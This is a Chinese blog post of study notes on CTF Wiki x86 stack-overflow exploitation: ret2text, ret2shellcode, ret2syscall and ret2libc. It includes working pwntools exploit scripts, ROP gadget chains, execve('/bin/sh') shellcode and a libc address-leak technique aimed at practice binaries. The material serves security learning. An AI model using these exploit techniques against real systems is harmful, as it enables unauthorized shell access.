CTFWiki_PWN_LinuxPlatform_UserMode_Exploitation_StackOverflow_x86

已于 2022-06-16 17:25:19 修改
阅读量637 收藏
点赞数 1
分类专栏: CTFWiki_PWN 文章标签: 网络安全
于 2022-06-14 23:57:34 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_46241655/article/details/125287268
版权

函数调用栈

先看这个文章学习函数调用栈

基本ROP

ret2text

出栈时RIP指向栈存放函数返回地址的位置,这个地址我们可以改为一个汇编指令的地址,RIP一直往后面指,以那个地址为起点一直往后执行

.text:0804862D                 call    ___isoc99_scanf
.text:08048632                 mov     eax, [ebp+input]
.text:08048635                 cmp     eax, [ebp+secretcode]
.text:08048638                 jnz     short locret_8048646
.text:0804863A                 mov     dword ptr [esp], offset command ; "/bin/sh"
.text:08048641                 call    _system

把函数返回地址设为0804863A,会一直往后执行

.text:0804863A                 mov     dword ptr [esp], offset command ; "/bin/sh"
.text:08048641                 call    _system

ret2shellcode

把恶意汇编代码写到数组(代码块)里面,返回地址指向这个数组(代码块)首地址。
这个数组要可读写执行,全局变量(.bss)有这个特点
ljust() 用法

str = "this is string example....wow!!!";
print str.ljust(50, '0');
#ljust()返回一个原字符串左对齐,并使用空格填充至指定长度的新字符串。
#如果指定的长度小于原字符串的长度则返回原字符串。
#输出 this is string example....wow!!!000000000000000000

shellcraft.sh() 打印结果

    /* execve(path='/bin///sh', argv=['sh'], envp=0) */
    /* push b'/bin///sh\x00' */
    push 0x68
    push 0x732f2f2f
    push 0x6e69622f
    mov ebx, esp
    /* push argument array ['sh\x00'] */
    /* push 'sh\x00\x00' */
    push 0x1010101
    xor dword ptr [esp], 0x1016972
    xor ecx, ecx
    push ecx /* null terminate */
    push 4
    pop ecx
    add ecx, esp
    push ecx /* 'sh\x00' */
    mov ecx, esp
    xor edx, edx
    /* call execve() */
    push SYS_execve /* 0xb */
    pop eax
    int 0x80

计算偏移

disass main

反汇编 main 函数找到 main 的第一条指针所在的地址
在这里插入图片描述
在get函数下面的语句打断点

在这里插入图片描述

0xffffd038 - 0xffffcfcc + 0x4 = 112

exp.py

#!/usr/bin/env python
from pwn import *

sh = process('./ret2shellcode')
shellcode = asm(shellcraft.sh())
#asm()得到汇编码的机器代码
#shellcraft.sh()生成汇编代码shellcode
buf2_addr = 0x804a080

sh.sendline(shellcode.ljust(112, b'A') + p32(buf2_addr))

sh.interactive()

不知道为什么会报错,后来看了一下,发现要写入shellcode的全局数组在不可执行段
这个方法应该是行不通了

ret2syscall

利用系统调用
该程序是 32 位,所以我们需要使得

系统调用号,即 eax 应该为 0xb
第一个参数,即 ebx 应该指向 /bin/sh 的地址,其实执行 sh 的地址也可以。
第二个参数,即 ecx 应该为 0
第三个参数,即 edx 应该为 0

设置寄存器的值,我们需要指令pop eax并且还要ret回栈继续下一个pop
使用命令查找

ROPgadget --binary xxx  --only 'pop|ret' | grep 'eax'

发现一个地址可以一次给三个寄存器赋值
在这里插入图片描述
查找’/bin/sh’字符串

ROPgadget --binary xxx  --string '/bin/sh'

查找int 0x80

ROPgadget --binary xxx  --only 'int'

按照前面教程找偏移,用命令n一步步执行
在这里插入图片描述

0x98 - 0x2c + 0x4 = 112

exp.py

#!/usr/bin/env python
from pwn import *

sh = process('./rop')

pop_eax_ret = 0x080bb196
pop_edx_ecx_ebx_ret = 0x0806eb90
int_0x80 = 0x08049421
binsh = 0x80be408
payload = flat([b'A'*112, pop_eax_ret, 0xb, pop_edx_ecx_ebx_ret, 0, 0, binsh, int_0x80])
sh.sendline(payload)
sh.interactive()

#!/usr/bin/env python
from pwn import *

r = process("./rop")

pop_eax_ret_addr = 0x080bb196
pop_edx_pop_ecx_pop_ebx_ret_addr = 0x0806eb90
bin_addr = 0x080be408
int_0x80_addr = 0x08049421

payload = b'A'*112 + p32(pop_eax_ret_addr) + p32(0xb) + p32(pop_edx_pop_ecx_pop_ebx_ret_addr) + p32(0) + p32(0) + p32(bin_addr) + p32(int_0x80_addr)

r.sendline(payload)
r.interactive()

ret2libc1

命令查找字符串'/bin/sh'

ROPgadget --binary ret2libc1 --string '/bin/sh'

在IDA里面查找.plt里面有没有system函数
如果是正常调用 system 函数,我们调用的时候会有一个对应的返回地址
因为之前ret2text、ret2shellcode是调用代码块,ret2syscall是进行系统调用,都不是正常的函数,调用ret2libc是正常的函数调用,所以根据函数调用栈的约定,要写返回地址,它在比参数地址小4(32位)的位置

ret2libc2

没有'/bin/sh',发现可以用plt中的gets()写入全局数组然后读取

from pwn import *

sh = process('./ret2libc2')
gets_plt = 0x08048460
system_plt = 0x08048490
pop_ebx_ret = 0x0804843d
buf2 = 0x0804A080
payload = flat(['a'*112, gets_plt, pop_ebx_ret, buf2, system_plt, 'aaaa', buf2])
sh.sendline(payload)
sh.sendline('/bin/sh')
sh.interactive()

gets_plt是gets()地址,pop_ebx_ret是返回地址,函数调用完后到pop_ebx_ret执行命令

0x0804843d : pop ebx ; ret

这里的地址把pop_ebx_ret弹出来,又ret让ip指向栈,进行指到system_plt,调用system()

ret2libc3

如hollk大佬所说

第二个payload用104个字节填满栈空间是因为第二次调用main函数的时候可能缺少了栈初始化的过程,第二次调用的时候并不是从一开始的OPE进入的,所以出现了少8位的情况,可以使用动态调试器修改内存地址进行调试计算

如果LibcSearcher报错:no matched libc,please add more libc or try others
要更新一下libc-database
具体看这篇文章
exp.py用Wiki里面的,用python2运行
第一次溢出用puts函数打印__libc_start_main在got中位置,用u32()转换为数字,[0:4]是为了去掉框出的前面的字符串
把地址保存在libc_start_main_addr变量里面,找libc版本,其他略

#!/usr/bin/env python
from pwn import *
from LibcSearcher import LibcSearcher
sh = process('./ret2libc3')

ret2libc3 = ELF('./ret2libc3')

puts_plt = ret2libc3.plt['puts']
libc_start_main_got = ret2libc3.got['__libc_start_main']
main = ret2libc3.symbols['main']

print "leak libc_start_main_got addr and return to main again"
payload = flat(['A' * 112, puts_plt, main, libc_start_main_got])
sh.sendlineafter('Can you find it !?', payload)

print "get the related addr"
libc_start_main_addr = u32(sh.recv()[0:4])
libc = LibcSearcher('__libc_start_main', libc_start_main_addr)
libcbase = libc_start_main_addr - libc.dump('__libc_start_main')
system_addr = libcbase + libc.dump('system')
binsh_addr = libcbase + libc.dump('str_bin_sh')

print "get shell"
payload = flat(['A' * 104, system_addr, 'a'*4, binsh_addr])
sh.sendline(payload)

sh.interactive()

运行后让我们从0、1中选一个,我选0,然后可以执行命令了
在这里插入图片描述

中级 ROP

ret2csu

专注pwn0年
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
PWM.rar_ARM7 汇编_PWN_pwm arm7
09-22
ARM7下PWN接口的使用源码,包含C语言及汇编
[二进制学习笔记]LibcSearcher报错no matched libc
hide_in_darkness的博客
08-08 1053
​ git clone git://github.com/niklasb/libc-database # 重新拖一个库下来。​ 很纳闷,我都已经安装了LibcSearcher,而且在在线查询网上也存在版本号,但是为什么就是没有呢?​ 简单的讲就是如果LibcSearcher默认的库中没有你所需要的版本,那么就需要你手动下载一下了。(1)rm -rf libc-database/* # 删除原有的所有配置文件。​ 查看libc-database文件夹文件夹下面有一个说明MD文档。...
【python3】no matched libc,please add more libc or try others
amber_o0k的博客
11-15 1266
注意你py脚本文件所在文件内是否有其他的LibcSearcher.py(如果有你将导入错误的LibcSearcher) 用pip install LibcSearcher ,安装该库。 C:\Python39\Lib\LibcSearcher\libc-database\db /home/ctf/.local/lib/python3.6/site-packages/LibcSearcher ...
BUU刷题-Pwn-_HarekazeCTF2019_baby_rop2
一个啥也不会的小菜鸡!
07-13 49
调用printf函数需要两个参数,所以需要使用rdi和rsi两个寄存器!利用printf泄露函数地址,从而利用system函数。但如果是单独泄露libc只需要一个寄存器rdi!printf_got或者read_got。[[LibcSearcher的使用]]但泄露printf_got时无法泄露。所以泄露read的地址即可!调用其中的%s来输出函数地址。
记一次配置kali-linux for wsl
weixin_52111404的博客
10-28 2064
配置kali-linux;wsl迁移;kali-linux for wsl;kali pwn环境,wsl成功直接调用pwntools中的gdb.debug模块
LibcSearcher报错:no matched libc,please add more libc or try others
qq_40889704的博客
05-09 3461
今天在CTF-wiki上学习缓冲区溢出攻击中的ret2libc 在编写攻击代码时,用到了一个名为LibcSearcher的库,来确定libc中某个函数的地址。 这里先给出库的链接:https://github.com/lieanu/LibcSearcher 但是按照wiki上给出的例子编写好攻击代码,在运行时报错了: no matched libc,please add more libc or try others 大概意思是找不到匹配的libc版本库。 进到LibcSearcher的libc-data
No matched libc, please add more libc or try others
Dem1的博客
05-18 661
在使用libcsearcher库的时候出现报错 弄了很久终于弄好了 打开libcSearcher目录下的libcdatabase #删除libcdatabase里的文件 rm -rf * #重新安装libcdatabase的东西 git clone https://github.com/niklasb/libc-database ./get ubuntu #出现报错Requirements for download or update ‘ubuntu’ are not met. Please, refer
use-after-free漏洞-hacknote
qq_43390703的博客
10-17 1109
hacknote 经典的use-after-free漏洞。 原理 简单的说,Use After Free 就是其字面所表达的意思,当一个内存块被释放之后再次被使用。但是其实这里有以下几种情况 内存块被释放后,其对应的指针被设置为 NULL , 然后再次使用,自然程序会崩溃。 内存块被释放后,其对应的指针没有被设置为 NULL ,然后在它下一次被使用之前,没有代码对这块内存块进行修改,那么程序很有可能可以正常运转。 内存块被释放后,其对应的指针没有被设置为 NULL,但是在它下一次使用之前,有代码对这块内存
no matched libc,please add more libc or try others
m0_55906008的博客
05-04 585
打开libcSearcher目录下的libcdatabase: 输入以下命令 rm -rf * git clone https://github.com/niklasb/libc-database ./get ubuntu 通过查看libcdatabase下的README.md文件获得get更新指令,执行./get时可能会出现以下报错信息: Requirements for download or update ‘ubuntu’ are not met. Please, refer to README.
ciscn_2019_c_1,The address should be an int number【libcsearcher】
amber_o0k的博客
11-06 298
from pwn import * from LibcSearcher import * context.os='linux' context.arch='amd64' # context.log_level='debug' ru=lambda x:io.recvuntil(x) rl=lambda :io.recvline() sla=lambda x,y:io.sendlineafter(x,y) io=remote('node4.buuoj.cn',27181) elf=ELF('./cisc.
PWN.rar_AVR PWM_GPS FPGA_PWN_avr_avr pwn
09-23
AVR系列单片机Mage8PWM脉冲输出程序
mc.zip_package4dr_pwm_pwn发生器_verilog hdl_wayyy7
09-23
pwn信号发生器的源代码和仿真图,该程序可实现频率可调,占空比可调的pwm信号
PWN.rar_pulse verilog_pulse width_verilog hdl
09-20
Pulse Width modulation using Verilog HDL
pwm_gen_pwmgen_PWM_gen_
10-02
pwm_gen,PWN波形发生器,开关波形
libc,glibclibc关系
CSDN博客
06-04 557
【glibclibc】 glibclibc 都是 Linux 下的 C 函数库。 libcLinux 下的 ANSI C 函数库;glibcLinux 下的 GUN C 函数库。 ANSI C 和 GNU C 有什么区别呢? ANSI C 函数库是基本的 C 语言函数库,包含了 C 语言最基本的库函数。这个库可以根据头文件划分为 15 个部分,其中包括: <ctype.h>:包含用来测试某个特征字符的函数的函数原型,以及用来转换大小写字母的函数原...
关于ARM-LINUX在启动时,遇到/sbin/init 找不到libc.so的原因
qq_25771603的博客
07-15 1287
单位项目,用自制的交叉编译器,制作rootfs,在启动的时候遇到 运行/sbin/init中提示找不到libc.so.6。 查询原因,ld-linux-armhf.so.3中,指定了动态库的加载地址不为/lib与/usr/lib,而是在glibc编译时指定的安装地址(自制arm-linux-gnueabi-gcc)。 https://sourceware.org/glibc/wiki/Tes
Native方法使用
谭宇
11-28 149
https://blog.csdn.net/zw6161080123/article/details/80628069
pwn 暑假复习三 libc泄露
SsMing的博客
07-15 7358
ctfwiki例一:ret2libc2拿到程序checksec查看:没什么问题源码int __cdecl main(int argc, const char **argv, const char **envp) { int v4; // [sp+1Ch] [bp-64h]@1 setvbuf(stdout, 0, 2, 0); setvbuf(stdin, 0, 1, 0); p...
在ubnutu如何解决“No gnu/libc-version.h found, please install glibc-dev[el]/glibc-static”这个问题
ShawnWang1994的博客
03-26 8055
首先,你得明确出现上述是你的系统里缺少glibc库。 但是,你在ubnutu下安装glibc时,你会发现找不到安装包。 这个坑爹的问题一直困扰我很久! 原因是: Ubuntu下面的glibc的开发包不叫glibc-devel?devel后缀是rpm系的习惯,deb系用的是dev,而且Ubuntu下面的glibc不叫这名字,而叫libc才是吧。 再输入指令: 按tab键,发现可以安装。 安装完毕...
xdctf2015_pwn200
最新发布
09-03
xdctf2015_pwn200是一道CTF比赛中的题目,是一个二进制漏洞利用题目。从代码中可以看出,它利用了一个栈溢出漏洞来实现攻击。在攻击过程中,首先使用write函数的got地址来泄露出libc中write函数的真实地址,然后通过...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值